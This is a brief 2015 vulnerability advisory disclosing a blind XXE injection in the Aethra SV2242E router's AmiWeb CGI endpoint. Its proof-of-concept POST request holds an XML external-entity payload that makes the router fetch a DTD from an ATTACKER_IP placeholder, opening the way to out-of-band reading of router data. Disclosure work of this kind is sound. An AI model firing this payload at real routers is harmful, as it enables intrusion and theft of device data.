Aethra SV2242E XXE Injection
Posted on 04 December 2015
# Author : Ahmed Sultan # Email : 0x4148@gmail.com # Vuln. software : Aethra SV2242E # Vendor site : aethra.it # CVE : Requested , but haven't been assigned yet # tested on : ATOS 5.6.x The bug rise because of the remote user input to "/cgi-bin/AmiWeb" is not sensitized before being parsed which cause the availability of blind XXE attack that might result in reading sensitive data from the router system A proof of concept POST /cgi-bin/AmiWeb HTTP/1.1 Content-type: application/xml Host: ROUTER_IP Content-Length: 155 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://ATTACKER_IP/0x4148_jnk"> %remote; %int; %trick;]> That will result in HTTP request to ATTACKER_IP/0x4148_jnk further exploitation might be done by using OOB (Out Of Bound) XXE attacks to reach sensitive data on the server